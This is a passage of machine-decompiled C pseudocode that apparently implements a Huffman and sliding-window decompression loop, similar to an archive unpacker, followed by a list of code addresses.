						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
						 *(_t725 + 0x18) = _t363;
						 *(_t725 + 0x14) = _t694;
						 *(_t725 + 0x2c) = _t363;
						__eflags = _t363 - _t694;
						if(_t363 >= _t694) {
							 *(_t725 + 0x2c) = _t694;
						}
						_t524 =  *(_t725 + 0x10);
						while(1) {
							_t673 =  *(_t686 + 0xe6dc);
							_t628 =  *(_t686 + 0x7c) & _t673;
							 *(_t686 + 0x7c) = _t628;
							_t525 =  *_t524;
							__eflags = _t525 -  *(_t725 + 0x2c);
							if(_t525 <  *(_t725 + 0x2c)) {
								goto L19;
							}
							L13:
							__eflags = _t525 - _t363;
							if(__eflags > 0) {
								L145:
								return 1;
							}
							if(__eflags != 0) {
								L16:
								__eflags = _t525 - _t705;
								if(_t525 < _t705) {
									L18:
									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
										L144:
										 *((char*)(_t520 + 0x4ad3)) = 1;
										goto L145;
									}
									goto L19;
								}
								__eflags =  *((char*)(_t520 + 0x4ad2));
								if( *((char*)(_t520 + 0x4ad2)) == 0) {
									goto L144;
								}
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
								goto L145;
							}
							goto L16;
							L19:
							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
							__eflags = (_t526 - _t628 & _t673) - 0x1004;
							if((_t526 - _t628 & _t673) >= 0x1004) {
								L24:
								_t674 =  *(_t725 + 0x10);
								_t367 = E003DA89D(_t674);
								_t368 =  *(_t520 + 0xb4);
								_t630 = _t367 & 0x0000fffe;
								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
									_t528 = 0xf;
									_t369 = _t368 + 1;
									 *(_t725 + 0x28) = _t528;
									__eflags = _t369 - _t528;
									if(_t369 >= _t528) {
										L32:
										_t696 = _t674[1] + _t528;
										_t697 = _t696 & 0x00000007;
										 *_t674 =  *_t674 + (_t696 >> 3);
										 *(_t725 + 0x1c) =  *_t674;
										_t373 =  *(_t725 + 0x28);
										_t674[1] = _t697;
										_t529 = 0x10;
										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
										asm("sbb eax, eax");
										_t374 = _t373 & _t532;
										__eflags = _t374;
										_t524 =  *(_t725 + 0x10);
										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
										_t375 =  *(_t725 + 0x1c);
										L33:
										_t634 = _t633 & 0x0000ffff;
										__eflags = _t634 - 0x100;
										if(_t634 >= 0x100) {
											__eflags = _t634 - 0x106;
											if(_t634 < 0x106) {
												__eflags = _t634 - 0x100;
												if(_t634 != 0x100) {
													__eflags = _t634 - 0x101;
													if(_t634 != 0x101) {
														_t635 = _t634 + 0xfffffefe;
														__eflags = _t635;
														_t534 = _t686 + (_t635 + 0x18) * 4;
														_t698 =  *_t534;
														 *(_t725 + 0x28) = _t698;
														if(_t635 == 0) {
															L117:
															 *(_t686 + 0x60) = _t698;
															_t699 =  *(_t725 + 0x10);
															_t376 = E003DA89D(_t699);
															_t377 =  *(_t520 + 0x2d78);
															_t637 = _t376 & 0x0000fffe;
															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
																_t676 = 0xf;
																_t378 = _t377 + 1;
																__eflags = _t378 - _t676;
																if(_t378 >= _t676) {
																	L125:
																	_t537 = _t699[1] + _t676;
																	_t538 = _t537 & 0x00000007;
																	_t699[1] = _t538;
																	 *_t699 =  *_t699 + (_t537 >> 3);
																	_t381 =  *_t699;
																	 *(_t725 + 0x34) = _t538;
																	_t539 = 0x10;
																	 *(_t725 + 0x30) = _t381;
																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t382 = _t381 & _t542;
																	__eflags = _t382;
																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
																	L126:
																	_t677 = _t383 & 0x0000ffff;
																	__eflags = _t677 - 8;
																	if(_t677 >= 8) {
																		_t702 = (_t677 >> 2) - 1;
																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
																		__eflags = _t702;
																		if(_t702 != 0) {
																			_t411 = E003DA89D( *(_t725 + 0x10));
																			_t644 =  *(_t725 + 0x10);
																			_t549 = 0x10;
																			_t681 = _t681 + (_t411 >> _t549 - _t702);
																			_t552 =  *(_t725 + 0x34) + _t702;
																			_t553 = _t552 & 0x00000007;
																			__eflags = _t553;
																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
																			_t644[1] = _t553;
																		}
																	} else {
																		_t681 = _t677 + 2;
																	}
																	_t640 =  *(_t686 + 0x7c);
																	_t544 =  *(_t725 + 0x28);
																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	_t704 = _t640 - _t544;
																	 *(_t686 + 0x74) = _t681;
																	__eflags = _t704 - _t385;
																	if(_t704 >= _t385) {
																		L140:
																		_t524 =  *(_t725 + 0x10);
																		_t363 =  *(_t725 + 0x18);
																		__eflags = _t681;
																		if(_t681 == 0) {
																			goto L11;
																		}
																		_t388 =  *(_t686 + 0xe6dc);
																		do {
																			_t389 = _t388 & _t704;
																			_t704 = _t704 + 1;
																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
																			_t388 =  *(_t686 + 0xe6dc);
																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
																			 *(_t686 + 0x7c) = _t640;
																			_t681 = _t681 - 1;
																			__eflags = _t681;
																		} while (_t681 != 0);
																		goto L35;
																	} else {
																		__eflags = _t640 - _t385;
																		if(_t640 >= _t385) {
																			goto L140;
																		}
																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t521 = _t391 + _t704;
																		_t710 = _t391 + _t640;
																		_t643 = 8;
																		 *(_t686 + 0x7c) = _t640 + _t681;
																		__eflags = _t681 - _t643;
																		if(_t681 < _t643) {
																			L84:
																			_t363 =  *(_t725 + 0x18);
																			_t524 =  *(_t725 + 0x10);
																			__eflags = _t681;
																			if(_t681 == 0) {
																				L10:
																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																				L11:
																				_t705 =  *(_t725 + 0x14);
																				continue;
																				do {
																					do {
																						_t673 =  *(_t686 + 0xe6dc);
																						_t628 =  *(_t686 + 0x7c) & _t673;
																						 *(_t686 + 0x7c) = _t628;
																						_t525 =  *_t524;
																						__eflags = _t525 -  *(_t725 + 0x2c);
																						if(_t525 <  *(_t725 + 0x2c)) {
																							goto L19;
																						}
																						goto L13;
																					} while (_t681 == 0);
																					_t646 =  *(_t686 + 0x7c);
																					_t561 =  *(_t686 + 0x60);
																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																					_t709 = _t646 - _t561;
																					__eflags = _t709 - _t421;
																					if(_t709 >= _t421) {
																						L112:
																						_t422 =  *(_t686 + 0xe6dc);
																						do {
																							_t423 = _t422 & _t709;
																							_t709 = _t709 + 1;
																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
																							_t422 =  *(_t686 + 0xe6dc);
																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
																							 *(_t686 + 0x7c) = _t646;
																							_t681 = _t681 - 1;
																							__eflags = _t681;
																						} while (_t681 != 0);
																						L35:
																						_t524 =  *(_t725 + 0x10);
																						_t363 =  *(_t725 + 0x18);
																						goto L11;
																					}
																					__eflags = _t646 - _t421;
																					if(_t646 >= _t421) {
																						goto L112;
																					}
																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
																					_t521 = _t425 + _t709;
																					_t710 = _t425 + _t646;
																					_t649 = 8;
																					 *(_t686 + 0x7c) = _t646 + _t681;
																					__eflags = _t681 - _t649;
																					if(_t681 < _t649) {
																						goto L84;
																					}
																					__eflags = _t561 - _t681;
																					if(_t561 >= _t681) {
																						_t428 = _t681 >> 3;
																						__eflags = _t428;
																						 *(_t725 + 0x34) = _t428;
																						_t688 = _t428;
																						do {
																							E003F0320(_t710, _t521, _t649);
																							_t725 = _t725 + 0xc;
																							_t649 = 8;
																							_t521 = _t521 + _t649;
																							_t710 = _t710 + _t649;
																							_t681 = _t681 - _t649;
																							_t688 = _t688 - 1;
																							__eflags = _t688;
																						} while (_t688 != 0);
																						L83:
																						_t686 =  *(_t725 + 0x24);
																						goto L84;
																					}
																					_t564 = _t681 >> 3;
																					__eflags = _t564;
																					do {
																						_t681 = _t681 - _t649;
																						 *_t710 =  *_t521;
																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																						_t437 =  *((intOrPtr*)(_t521 + 7));
																						_t521 = _t521 + _t649;
																						 *((char*)(_t710 + 7)) = _t437;
																						_t710 = _t710 + _t649;
																						_t564 = _t564 - 1;
																						__eflags = _t564;
																					} while (_t564 != 0);
																					goto L84;
																					L92:
																					_t524 =  *(_t725 + 0x10);
																					_t705 =  *(_t725 + 0x14);
																					_t363 =  *(_t725 + 0x18);
																					__eflags = _t681;
																				} while (_t681 == 0);
																				_t463 =  *(_t686 + 0xe6dc);
																				_t716 =  *(_t725 + 0x34);
																				do {
																					_t464 = _t463 & _t716;
																					_t716 = _t716 + 1;
																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
																					_t463 =  *(_t686 + 0xe6dc);
																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
																					 *(_t686 + 0x7c) = _t658;
																					_t681 = _t681 - 1;
																					__eflags = _t681;
																				} while (_t681 != 0);
																				goto L35;
																			}
																			 *_t710 =  *_t521;
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 1;
																			if(_t681 <= 1) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 2;
																			if(_t681 <= 2) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 3;
																			if(_t681 <= 3) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 4;
																			if(_t681 <= 4) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 5;
																			if(_t681 <= 5) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 6;
																			if(_t681 <= 6) {
																				goto L10;
																			}
																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			goto L35;
																		}
																		__eflags = _t544 - _t681;
																		if(_t544 >= _t681) {
																			_t401 = _t681 >> 3;
																			__eflags = _t401;
																			 *(_t725 + 0x34) = _t401;
																			_t687 = _t401;
																			do {
																				E003F0320(_t710, _t521, _t643);
																				_t725 = _t725 + 0xc;
																				_t643 = 8;
																				_t521 = _t521 + _t643;
																				_t710 = _t710 + _t643;
																				_t681 = _t681 - _t643;
																				_t687 = _t687 - 1;
																				__eflags = _t687;
																			} while (_t687 != 0);
																			goto L83;
																		}
																		_t547 = _t681 >> 3;
																		__eflags = _t547;
																		do {
																			_t681 = _t681 - _t643;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t410 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t643;
																			 *((char*)(_t710 + 7)) = _t410;
																			_t710 = _t710 + _t643;
																			_t547 = _t547 - 1;
																			__eflags = _t547;
																		} while (_t547 != 0);
																		goto L84;
																	}
																}
																_t555 = _t520 + (_t378 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t637 -  *_t555;
																	if(_t637 <  *_t555) {
																		break;
																	}
																	_t378 = _t378 + 1;
																	_t555 = _t555 + 4;
																	__eflags = _t378 - 0xf;
																	if(_t378 < 0xf) {
																		continue;
																	}
																	goto L125;
																}
																_t676 = _t378;
																goto L125;
															}
															_t556 = 0x10;
															_t645 = _t637 >> _t556 - _t377;
															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
															 *_t699 =  *_t699 + (_t559 >> 3);
															_t560 = _t559 & 0x00000007;
															 *(_t725 + 0x30) =  *_t699;
															_t699[1] = _t560;
															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
															 *(_t725 + 0x34) = _t560;
															goto L126;
														} else {
															goto L116;
														}
														do {
															L116:
															 *_t534 =  *(_t534 - 4);
															_t534 = _t534 - 4;
															_t635 = _t635 - 1;
															__eflags = _t635;
														} while (_t635 != 0);
														goto L117;
													}
													_t681 =  *(_t686 + 0x74);
													_t705 =  *(_t725 + 0x14);
													_t363 =  *(_t725 + 0x18);
													__eflags = _t681;
												}
												_push(_t725 + 0x38);
												_t439 = E003E3F9D(_t686, _t524);
												__eflags = _t439;
												if(_t439 == 0) {
													goto L145;
												}
												_t441 = E003E253E(_t686, _t725 + 0x38);
												__eflags = _t441;
												if(_t441 == 0) {
													goto L145;
												}
												goto L35;
											}
											_t682 = _t634 - 0x106;
											__eflags = _t682 - 8;
											if(_t682 >= 8) {
												_t444 = (_t682 >> 2) - 1;
												 *(_t725 + 0x34) = _t444;
												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
												__eflags = _t444;
												if(_t444 == 0) {
													L39:
													_t445 =  *(_t725 + 0x10);
													L40:
													_t446 = E003DA89D(_t445);
													_t447 =  *(_t520 + 0xfa0);
													_t651 = _t446 & 0x0000fffe;
													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
														_t711 = 0xf;
														_t448 = _t447 + 1;
														 *(_t725 + 0x28) = _t711;
														__eflags = _t448 - _t711;
														if(_t448 >= _t711) {
															L50:
															_t569 =  *(_t725 + 0x10);
															_t713 = _t569[1] +  *(_t725 + 0x2c);
															_t714 = _t713 & 0x00000007;
															 *_t569 =  *_t569 + (_t713 >> 3);
															 *(_t725 + 0x24) =  *_t569;
															_t452 =  *(_t725 + 0x2c);
															_t569[1] = _t714;
															_t570 = 0x10;
															 *(_t725 + 0x1c) = _t714;
															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
															asm("sbb eax, eax");
															_t453 = _t452 & _t573;
															__eflags = _t453;
															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
															L51:
															_t654 = _t454 & 0x0000ffff;
															__eflags = _t654 - 4;
															if(_t654 >= 4) {
																_t457 = (_t654 >> 1) - 1;
																 *(_t725 + 0x30) = _t457;
																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
																 *(_t725 + 0x34) = _t575;
																_t715 = _t575;
																 *(_t725 + 0x28) = _t715;
																__eflags = _t457;
																if(_t457 == 0) {
																	L70:
																	__eflags = _t715 - 0x100;
																	if(_t715 > 0x100) {
																		_t681 = _t681 + 1;
																		__eflags = _t715 - 0x2000;
																		if(_t715 > 0x2000) {
																			_t681 = _t681 + 1;
																			__eflags = _t715 - 0x40000;
																			if(_t715 > 0x40000) {
																				_t681 = _t681 + 1;
																				__eflags = _t681;
																			}
																		}
																	}
																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
																	 *(_t686 + 0x60) = _t715;
																	_t658 =  *(_t686 + 0x7c);
																	_t577 = _t658 - _t715;
																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	 *(_t686 + 0x74) = _t681;
																	 *(_t725 + 0x34) = _t577;
																	__eflags = _t577 - _t462;
																	if(_t577 >= _t462) {
																		goto L92;
																	} else {
																		__eflags = _t658 - _t462;
																		if(_t658 >= _t462) {
																			goto L92;
																		}
																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t710 = _t466 + _t658;
																		_t521 = _t466 + _t577;
																		_t661 = 8;
																		 *(_t686 + 0x7c) = _t658 + _t681;
																		__eflags = _t681 - _t661;
																		if(_t681 < _t661) {
																			goto L84;
																		}
																		__eflags =  *(_t725 + 0x28) - _t681;
																		if( *(_t725 + 0x28) >= _t681) {
																			_t469 = _t681 >> 3;
																			__eflags = _t469;
																			 *(_t725 + 0x34) = _t469;
																			_t689 = _t469;
																			do {
																				E003F0320(_t710, _t521, _t661);
																				_t725 = _t725 + 0xc;
																				_t661 = 8;
																				_t521 = _t521 + _t661;
																				_t710 = _t710 + _t661;
																				_t681 = _t681 - _t661;
																				_t689 = _t689 - 1;
																				__eflags = _t689;
																			} while (_t689 != 0);
																			goto L83;
																		}
																		_t580 = _t681 >> 3;
																		__eflags = _t580;
																		do {
																			_t681 = _t681 - _t661;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t478 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t661;
																			 *((char*)(_t710 + 7)) = _t478;
																			_t710 = _t710 + _t661;
																			_t580 = _t580 - 1;
																			__eflags = _t580;
																		} while (_t580 != 0);
																		goto L84;
																	}
																}
																__eflags = _t457 - 4;
																if(__eflags < 0) {
																	_t479 = E003E8934( *(_t725 + 0x10));
																	_t662 =  *(_t725 + 0x10);
																	_t582 = 0x20;
																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
																	_t586 = _t585 & 0x00000007;
																	__eflags = _t586;
																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
																	_t662[1] = _t586;
																	L69:
																	 *(_t725 + 0x28) = _t715;
																	goto L70;
																}
																if(__eflags <= 0) {
																	_t483 =  *(_t725 + 0x10);
																} else {
																	_t499 = E003E8934( *(_t725 + 0x10));
																	_t500 =  *(_t725 + 0x30);
																	_t604 = 0x24;
																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
																	_t483 =  *(_t725 + 0x10);
																	_t608 = _t607 & 0x00000007;
																	 *(_t725 + 0x20) = _t669;
																	 *(_t725 + 0x1c) = _t608;
																	 *_t483 = _t669;
																	_t483[1] = _t608;
																}
																_t484 = E003DA89D(_t483);
																_t485 =  *(_t520 + 0x1e8c);
																_t664 = _t484 & 0x0000fffe;
																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
																	_t588 = 0xf;
																	_t486 = _t485 + 1;
																	 *(_t725 + 0x28) = _t588;
																	__eflags = _t486 - _t588;
																	if(_t486 >= _t588) {
																		L66:
																		_t690 =  *(_t725 + 0x10);
																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
																		 *_t690 =  *_t690 + (_t590 >> 3);
																		_t690[1] = _t590 & 0x00000007;
																		_t491 =  *(_t725 + 0x2c);
																		_t592 = 0x10;
																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
																		asm("sbb eax, eax");
																		_t492 = _t491 & _t595;
																		__eflags = _t492;
																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
																		goto L67;
																	}
																	_t597 = _t520 + (_t486 + 0x783) * 4;
																	while(1) {
																		__eflags = _t664 -  *_t597;
																		if(_t664 <  *_t597) {
																			break;
																		}
																		_t486 = _t486 + 1;
																		_t597 = _t597 + 4;
																		__eflags = _t486 - 0xf;
																		if(_t486 < 0xf) {
																			continue;
																		}
																		goto L66;
																	}
																	 *(_t725 + 0x28) = _t486;
																	goto L66;
																} else {
																	_t691 =  *(_t725 + 0x10);
																	_t598 = 0x10;
																	_t667 = _t664 >> _t598 - _t485;
																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
																	_t691[1] = _t601 & 0x00000007;
																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
																	L67:
																	_t686 =  *(_t725 + 0x24);
																	_t715 = _t715 + (_t493 & 0x0000ffff);
																	goto L69;
																}
															}
															_t715 = _t654 + 1;
															goto L69;
														}
														_t610 = _t520 + (_t448 + 0x3c8) * 4;
														while(1) {
															__eflags = _t651 -  *_t610;
															if(_t651 <  *_t610) {
																break;
															}
															_t448 = _t448 + 1;
															_t610 = _t610 + 4;
															__eflags = _t448 - _t711;
															if(_t448 < _t711) {
																continue;
															}
															goto L50;
														}
														 *(_t725 + 0x28) = _t448;
														goto L50;
													}
													_t611 = 0x10;
													_t670 = _t651 >> _t611 - _t447;
													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
													_t506 =  *(_t725 + 0x10);
													_t615 = _t614 & 0x00000007;
													 *(_t725 + 0x20) = _t723;
													 *(_t725 + 0x1c) = _t615;
													 *_t506 = _t723;
													_t506[1] = _t615;
													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
													goto L51;
												}
												_t507 = E003DA89D( *(_t725 + 0x10));
												_t724 = _t697 +  *(_t725 + 0x34);
												_t617 = 0x10;
												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
												_t445 =  *(_t725 + 0x10);
												_t697 = _t724 & 0x00000007;
												 *(_t725 + 0x1c) = _t620;
												 *_t445 = _t620;
												_t445[1] = _t697;
												goto L40;
											}
											 *(_t725 + 0x1c) = _t375;
											_t681 = _t682 + 2;
											__eflags = _t681;
											goto L39;
										}
										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
										_t72 = _t686 + 0x7c;
										 *_t72 =  *(_t686 + 0x7c) + 1;
										__eflags =  *_t72;
										goto L35;
									}
									_t623 = _t520 + (_t369 + 0xd) * 4;
									while(1) {
										__eflags = _t630 -  *_t623;
										if(_t630 <  *_t623) {
											break;
										}
										_t369 = _t369 + 1;
										_t623 = _t623 + 4;
										__eflags = _t369 - 0xf;
										if(_t369 < 0xf) {
											continue;
										}
										_t528 =  *(_t725 + 0x28);
										goto L32;
									}
									_t528 = _t369;
									 *(_t725 + 0x28) = _t369;
									goto L32;
								}
								_t624 = 0x10;
								_t671 = _t630 >> _t624 - _t368;
								_t524 = _t674;
								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
								 *_t524 =  *_t524 + (_t707 >> 3);
								_t697 = _t707 & 0x00000007;
								_t375 =  *_t524;
								_t524[1] = _t697;
								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
								 *(_t725 + 0x1c) = _t375;
								goto L33;
							}
							__eflags = _t526 - _t628;
							if(_t526 == _t628) {
								goto L24;
							}
							E003E5202(_t686);
							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
							if(__eflags > 0) {
								L6:
								return 0;
							}
							if(__eflags < 0) {
								goto L24;
							}
							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
								goto L6;
							}
							goto L24;
						}
					}
					L5:
					 *((char*)(_t520 + 0x4ad0)) = 1;
					goto L6;
				}
				 *((char*)(_t520 + 0x2c)) = 1;
				_push(_t520 + 0x30);
				_push(_t672);
				_push(_t692);
				if(E003E43BF(__ecx) == 0) {
					goto L5;
				} else {
					goto L4;
				}
			}





































































































































































                0x003e77f3
                0x003e77f9
                0x003e77ff
                0x003e7803
                0x003e7807
                0x003e780a
                0x003e780e
                0x003e7825
                0x003e7829
                0x003e782c
                0x003e7833
                0x003e784d
                0x003e784f
                0x003e7852
                0x003e7856
                0x003e785a
                0x003e785e
                0x003e7860
                0x003e7862
                0x003e7862
                0x003e7866
                0x003e7874
                0x003e7877
                0x003e787d
                0x003e787f
                0x003e7882
                0x003e7884
                0x003e7888
                0x00000000
                0x00000000
                0x003e788a
                0x003e788a
                0x003e788c
                0x003e81e3
                0x00000000
                0x003e81e3
                0x003e7892
                0x003e78a0
                0x003e78a0
                0x003e78a2
                0x003e78b1
                0x003e78b1
                0x003e78b7
                0x003e81dc
                0x003e81dc
                0x00000000
                0x003e81dc
                0x00000000
                0x003e78b7
                0x003e78a4
                0x003e78ab
                0x00000000
                0x00000000
                0x00000000
                0x003e78ab
                0x003e7897
                0x003e789a
                0x00000000
                0x00000000
                0x00000000
                0x003e78bd
                0x003e78bd
                0x003e78c9
                0x003e78ce
                0x003e7901
                0x003e7901
                0x003e7907
                0x003e790e
                0x003e7914
                0x003e791a
                0x003e791e
                0x003e7953
                0x003e7954
                0x003e7955
                0x003e7959
                0x003e795b
                0x003e797c
                0x003e797f
                0x003e7983
                0x003e7989
                0x003e798d
                0x003e7991
                0x003e7995
                0x003e799a
                0x003e79a7
                0x003e79a9
                0x003e79ac
                0x003e79ae
                0x003e79ae
                0x003e79b0
                0x003e79b4
                0x003e79bc
                0x003e79c0
                0x003e79c0
                0x003e79c8
                0x003e79ca
                0x003e79e8
                0x003e79ee
                0x003e7e80
                0x003e7e82
                0x003e7eb2
                0x003e7eb8
                0x003e7fb2
                0x003e7fb2
                0x003e7fbb
                0x003e7fbe
                0x003e7fc0
                0x003e7fc4
                0x003e7fd3
                0x003e7fd3
                0x003e7fd6
                0x003e7fdc
                0x003e7fe3
                0x003e7fe9
                0x003e7fef
                0x003e7ff6
                0x003e802f
                0x003e8030
                0x003e8031
                0x003e8033
                0x003e804f
                0x003e8052
                0x003e8056
                0x003e8059
                0x003e805f
                0x003e8069
                0x003e806c
                0x003e8072
                0x003e8075
                0x003e8082
                0x003e8084
                0x003e808a
                0x003e808c
                0x003e808c
                0x003e808e
                0x003e8096
                0x003e8096
                0x003e8099
                0x003e809c
                0x003e80ae
                0x003e80b3
                0x003e80b6
                0x003e80b8
                0x003e80be
                0x003e80c3
                0x003e80c9
                0x003e80d2
                0x003e80d4
                0x003e80df
                0x003e80df
                0x003e80e2
                0x003e80e4
                0x003e80e4
                0x003e809e
                0x003e809e
                0x003e809e
                0x003e80e7
                0x003e80f2
                0x003e80f6
                0x003e80fb
                0x003e80fd
                0x003e8100
                0x003e8102
                0x003e819e
                0x003e819e
                0x003e81a2
